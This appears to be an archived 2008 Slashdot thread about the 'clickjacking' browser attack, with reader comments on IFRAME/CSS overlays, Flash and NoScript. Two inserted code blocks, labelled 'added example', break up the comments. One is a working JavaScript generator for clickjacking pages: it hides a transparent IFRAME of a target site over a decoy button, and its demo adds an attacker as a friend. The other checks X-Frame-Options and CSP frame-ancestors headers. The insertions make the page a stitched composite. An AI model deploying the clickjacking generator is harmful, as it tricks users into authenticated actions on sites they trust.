Alarm Raised For "Clickjacking" Browser Exploit
Posted by timothy on Thursday September 25, @04:19PM
Shipment Date writes "ZDNet's Zero Day blog has some new information on what looks like a scary new browser exploit/threat affecting all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash. The threat, called Clickjacking, was to be discussed at the OWASP conference but was nixed at the last minute at the request of affected vendors. From the article: 'In a nutshell, it's when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'"
Related Stories
Fixes Released (and More Promised) For "Clickjacking" Exploits
An anonymous reader writes "As discussed previously on Slashdot, concern has been raised over a class of 'clickjacking' vulnerabilities which affect all major Web browsers. These exploits allow an attacker to place invisible or seemingly legit objects on a Web page that perform undesired actions when a user clicks on them. In recent developments, 'Guya' posted a scary proof-of-concept that hijacks Adobe Flash Player to spy on users with a webcam and/or microphone. In response, Adobe released an advisory with a temporary workaround, and stated that a future Player update will address the exploit. This prompted the original disclosers of the vulnerabilities to post a summary of the exploits. Additionally, Giorgio Maone, creator of the popular NoScript extension for Firefox and other Gecko-based browsers, released version 1.8.2.1 of NoScript, which adds 'ClearClick,' a feature that intercepts clicks made on invisible or otherwise obscured elements on a page. Although issues remain, there seems to be progress in addressing these security problems."
Hurray for us lynx users! (Score:5, Funny)
*crickets*
Re:Hurray for us lynx users! (Score:5, Informative)
Hmm, I'm able to use lynx to log into Gmail. Granted, I had to accept a million cookies and other things along the way.
Lynx Version 2.8.6rel.4 (15 Nov 2006)
libwww-FM 2.14, SSL-MM 1.4.1, GNUTLS 1.6.2, ncurses 5.6.20080308(wide)
Built on linux-gnu May 2 2007 08:54:50
Information (Score:5, Insightful)
Re:Information (Score:5, Funny)
It's very similar to the DNS issue from a couple of months back: It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.
Have a nice day.
Re:Information (Score:5, Informative)
It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)
Never gonna... (Score:5, Funny)
Re:Never gonna... (Score:5, Funny)
We're all going to end up seeing goatse.cx again.
yeah but now it will have Rick Astley playing in the background...
Summary wrong (Score:5, Informative)
The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'
The quote from the article says you can protect yourself by disabling scripting:
In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now.
Re:Summary wrong (Score:5, Informative)
The first quote is also from the article, so it's not the summary's fault. The article is vague and self-contradictory, so I'm calling bullshit until and unless further details are given.
Re:Summary wrong (Score:5, Informative)
The zdnet article is pretty vague, but I think it refers to the problem detailed in this message from Michal Zalewski [whatwg.org]:
"A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items', 'click to add Bob as a friend', etc. It may then provide own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."
Disabling JavaScript won't prevent the attack. It will break some mitigations, though!
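The attack Zalewski describes, as an added example (this is not code from the thread, from ZDNet, or from any vendor named here): an attacker page on domain A that frames domain B, makes the IFRAME fully transparent with CSS, and shifts it so that the one button the attacker wants pressed sits exactly under a visible decoy. The page contains no script of its own, which is why disabling JavaScript does not stop it. All URLs, labels and pixel coordinates below are made-up assumptions.

```javascript
// Added example, not code from the original page. Builds a script-free
// clickjacking page: a transparent IFRAME of the target site, positioned so
// that its button lies under our decoy. Every URL and coordinate is made up.

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Where to place the IFRAME so that the target button's top-left corner lands
// on the decoy's top-left corner. Coordinates are CSS pixels: targetButton is
// the button's position inside the framed page, decoy its position on ours.
function frameOffset(targetButton, decoy) {
  return { left: decoy.left - targetButton.left, top: decoy.top - targetButton.top };
}

function buildClickjackPage({ targetUrl, targetButton, decoy, decoyLabel,
                              frameSize = { width: 1280, height: 1024 } }) {
  const off = frameOffset(targetButton, decoy);
  const css = [
    // The decoy is what the user sees. It is sized like the real button so the
    // whole visible hit area maps onto the hidden one.
    `#decoy{position:absolute;left:${decoy.left}px;top:${decoy.top}px;` +
      `width:${targetButton.width}px;height:${targetButton.height}px;z-index:1}`,
    // The frame sits above the decoy (higher z-index) but is fully transparent,
    // so the click is delivered to domain B's button while the user believes
    // they clicked the decoy. Only CSS positioning and opacity are involved.
    `#victim{position:absolute;left:${off.left}px;top:${off.top}px;` +
      `width:${frameSize.width}px;height:${frameSize.height}px;border:0;opacity:0;z-index:2}`,
    "body{margin:0;overflow:hidden}",
  ].join("");
  return (
    '<!doctype html><html><head><meta charset="utf-8"><style>' + css + "</style></head><body>" +
    `<button id="decoy">${escapeHtml(decoyLabel)}</button>` +
    `<iframe id="victim" src="${escapeHtml(targetUrl)}"></iframe>` +
    "</body></html>"
  );
}

// Constructed scenario (all values assumed): domain B's "Add friend" button is
// 150x40 px at (620, 410) inside its page; we draw a decoy at (100, 100).
const demoPage = buildClickjackPage({
  targetUrl: "https://social.example/friends?add=attacker",
  targetButton: { left: 620, top: 410, width: 150, height: 40 },
  decoy: { left: 100, top: 100 },
  decoyLabel: "Claim your prize",
});
```

The negative offsets returned by `frameOffset` are the whole trick: the frame is pulled up and to the left until the wanted button is the only part of domain B under the decoy. Because the victim's cookies for domain B ride along with the framed request, the click is an authenticated action on B, which is what makes this more than a nuisance.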
Re:Summary wrong (Score:5, Interesting)
FWIW, this isn't exactly a new idea. roc and I discussed it back in 2002 [mozilla.org].
I'm glad it's getting attention now, though. Any fix is likely to require changes to specs.
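The spec changes anticipated above did come: the X-Frame-Options response header was introduced with Internet Explorer 8 in 2009 and adopted by the other browsers, and the Content-Security-Policy frame-ancestors directive later standardised the same control with finer granularity. The JavaScript "frame-busting" scripts sites used in 2008 are among the mitigations that disabling JavaScript breaks, as the reply above points out. The following is an added example, not code from the thread or from any browser vendor: a checker that decides from a response's headers whether the page may be framed by a given origin, following the rules browsers apply (frame-ancestors, when present, takes precedence over X-Frame-Options). All origins and header values are constructed.

```javascript
// Added example, not code from the original page. Evaluates whether a page
// served with `headers` may be framed by a page at `framerOrigin`, the way
// browsers evaluate X-Frame-Options and CSP frame-ancestors. Origins and
// headers used in the demo at the bottom are constructed.

const DEFAULT_PORT = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

function originParts(origin) {
  const u = new URL(origin);
  return { scheme: u.protocol, host: u.hostname.toLowerCase(),
           port: u.port || DEFAULT_PORT[u.protocol] || "" };
}

// CSP "scheme-part" matching: http: also matches https:, ws: also matches wss:.
function schemeMatches(want, have) {
  return want === have || (want === "http:" && have === "https:") || (want === "ws:" && have === "wss:");
}

// Match one frame-ancestors source expression against the parsed framer origin.
function sourceMatches(token, framer, page) {
  const t = token.trim().toLowerCase();
  if (!t || t === "'none'") return false;
  if (t === "'self'") {                       // conservative: exact origin only
    return page.scheme === framer.scheme && page.host === framer.host && page.port === framer.port;
  }
  if (t === "*") return framer.scheme === "http:" || framer.scheme === "https:";
  if (/^[a-z][a-z0-9+.-]*:$/.test(t)) return schemeMatches(t, framer.scheme); // e.g. "https:"
  // host-source: [scheme://]host[:port]; host may begin with "*."
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:\/]+)(?::(\d+|\*))?$/.exec(t);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (!schemeMatches(scheme ? scheme + ":" : page.scheme, framer.scheme)) return false;
  if (host.startsWith("*.")) {
    if (!framer.host.endsWith(host.slice(1))) return false; // "*.a.example" does not match "a.example"
  } else if (host !== framer.host) {
    return false;
  }
  if (port === "*") return true;
  if (port === undefined) return framer.port === DEFAULT_PORT[framer.scheme];
  return port === framer.port;
}

function parseCsp(value) {
  const directives = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && !(tokens[0].toLowerCase() in directives)) {
      directives[tokens[0].toLowerCase()] = tokens.slice(1); // first occurrence wins
    }
  }
  return directives;
}

function framingAllowed(headers, pageOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = Array.isArray(v) ? v : [v];
  const page = originParts(pageOrigin);
  const framer = originParts(framerOrigin);

  // frame-ancestors overrides X-Frame-Options; with several policies, all must allow.
  const policies = (h["content-security-policy"] || []).map(parseCsp).filter((p) => "frame-ancestors" in p);
  if (policies.length) {
    for (const p of policies) {
      let sources = p["frame-ancestors"];
      if (sources.length > 1) sources = sources.filter((s) => s.toLowerCase() !== "'none'");
      if (!sources.some((s) => sourceMatches(s, framer, page))) return { allowed: false, reason: "frame-ancestors" };
    }
    return { allowed: true, reason: "frame-ancestors" };
  }

  const xfo = (h["x-frame-options"] || []).flatMap((v) => v.split(",")).map((v) => v.trim().toUpperCase()).filter(Boolean);
  if (xfo.length) {
    if (new Set(xfo).size > 1) return { allowed: false, reason: "x-frame-options conflict" }; // conservative
    if (xfo[0] === "DENY") return { allowed: false, reason: "x-frame-options DENY" };
    if (xfo[0] === "SAMEORIGIN") {
      const same = page.scheme === framer.scheme && page.host === framer.host && page.port === framer.port;
      return { allowed: same, reason: "x-frame-options SAMEORIGIN" };
    }
    // ALLOW-FROM was never implemented by Chromium or Safari; like any other
    // unrecognised value it gives no protection in those browsers.
    return { allowed: true, reason: "x-frame-options value not enforced" };
  }
  return { allowed: true, reason: "no framing policy (the 2008 default)" };
}

// The header pair a site that must never be framed should send.
function defensiveHeaders() {
  return { "X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'" };
}
```

Sending both headers is the usual choice: frame-ancestors covers modern browsers with proper origin matching, and X-Frame-Options covers the older ones that only understand DENY and SAMEORIGIN. Neither depends on script in the page, which is exactly the property the 2008 frame-busting scripts lacked.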
Re:Summary wrong (Score:5, Informative)
+1 for "vague and self-contradictory."
From TFA: "The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you." and then "The exploit requires DHTML." As far as I know, DHTML requires a client-side scripting language--the most popular of which (only?) is JavaScript.
Re:Summary wrong (Score:5, Informative)
the problem is actually in dhtml, but javascript makes the exploit 'much easier'
hence, the attack sites will all be using javascript, because it's easier than writing it entirely in dhtml just to score an extra click from the guy who disabled javascript because he doesn't trust it.
BTW: in theory even sites like slashdot can be infected because the attack applies to all CSS coded sites. nice.
oh, BTW, if you have noscript installed, this vulnerability can only force clicks within the same domain, since cross site code is automatically disabled.. AFAIK the only way to disable CSS is to use obsolete browsers like lynx.
Thank Jeebus! (Score:5, Funny)
Re:Thank Jeebus! (Score:5, Funny)
Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browser exploit! I swear!
I don't know how things work for you, but saying that I just got clickjacked is only going to get me into more trouble, not less.
Bullshit? (Score:5, Insightful)
I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
Won't be losing any sleep over this one.
Re:Bullshit? (Score:5, Insightful)
Except you're wrong, but don't take my word for it (I run ha.ckers.org with RSnake), see what Adobe has to say.
http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html [adobe.com]
-id
Premature claim (Score:5, Interesting)
I didn't find that information in TFA or in any of the TFAs linked in TFA (here [adobe.com] here [ckers.org] here [blogspot.com] here [webadminblog.com]). Though it may be so; it sounds like this exploit makes use of the browser's access to the clipboard.
Elinks FTW!
OWASP (Score:5, Interesting)
Well, add OWASP to the list of security organizations with no integrity. It's clear they care about their sponsors, not their members.
One of these things is not like the other. (Score:5, Insightful)
Web browser, Web browser, Web browser, Web browser, and cross-platform method for running code delivered from untrusted sources.
From TFA:
One vendor is, unlike the others, mentioned by name. It happens to be the vendor that ships The One Thing That Is Not Like The Others.
Also from TFA:
and
"In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now."
Now we're at a quandary. Your humble correspondent is at a loss to even speculate as to the nature of a technology that firstly isn't Javashit, but which can conceivably be invoked by web content regardless of which web browser is in use, but lastly can be secured against by disabling hated plug-ins.
Re:One of these things is not like the other. (Score:5, Interesting)
> Now we're at a quandary. Your humble
> correspondent is at a loss to even speculate as
> to the nature of a technology that firstly isn't
> Javashit, but which can conceivably be invoked by
> web content regardless of which web browser is in
> use, but lastly can be secured against by
> disabling hated plug-ins.
It's a Flash exploit. I found a proof-of-concept by clicking around TFA, and it promised that the Flash movie would take over my clipboard, forcing me to close the browser window. I'm on Firefox 3.0.2, and the "proof-of-concept" did nothing.
At least nothing obvious. I suppose I could have been rootkitted.
Scary? (Score:5, Insightful)
I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model, since this would be great for clickfraud. Other than that, a website could bounce you to another page on their site that you didn't intend to go to, and possibly overwhelm your browser & bandwidth with a redirect loop. I can see a hint of an issue in the way frames might be used with this exploit and 3rd-party sites (as noted in the article), but that seems to be a bit of a stretch since the original site would still be sending someone away from their site in another redirect. Plenty of sites who make the choice to be annoying already make you go through a little effort to break out of their frames when you go to an external site from one of their links, it's not the end of the world.
I'd like to hear other folks' ideas on ways this may be used for an exploit that could do damage to anything other than Google's bottom-line. Until I hear a more compelling one, this exploit doesn't strike me as being the least bit "scary". A "small potential nuisance" might be a more apt description, since it would be fairly simple for end users to just ignore its effects.
I've seen this as a bug (Score:5, Interesting)
I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlaid on each other. It's not clear which one would be activated until you click. If someone intentionally did this AND obscured the object they wanted the victim to click, and made the other object more attractive, people might be doing such clicking. This could be easily done with CSS on one page, but there's no advantage since both links are just part of the same page. I don't think frames would do this. However, IFRAMES might do this on a cross "page" basis. The perp makes an attractive link that overlays an iframe that is loaded from another page, so the act of clicking gets the victim to effectively click on the other page. This loads something else in the iframe, but from the perspective of that other web site, it was a click on their page (based on the referer value). The simple exploit would get people to click on an ad, and it would not be visible to the ad vendor which page was doing the exploit.
Re:Konqueror? (Score:5, Funny)
The summary clearly states that only lynx is not affected. It's pretty obvious what's going on here: the exploit is a nefarious plot to make everyone switch over to lynx, thereby crippling the non-text-based porn industry.
Re:Konqueror? (Score:5, Funny)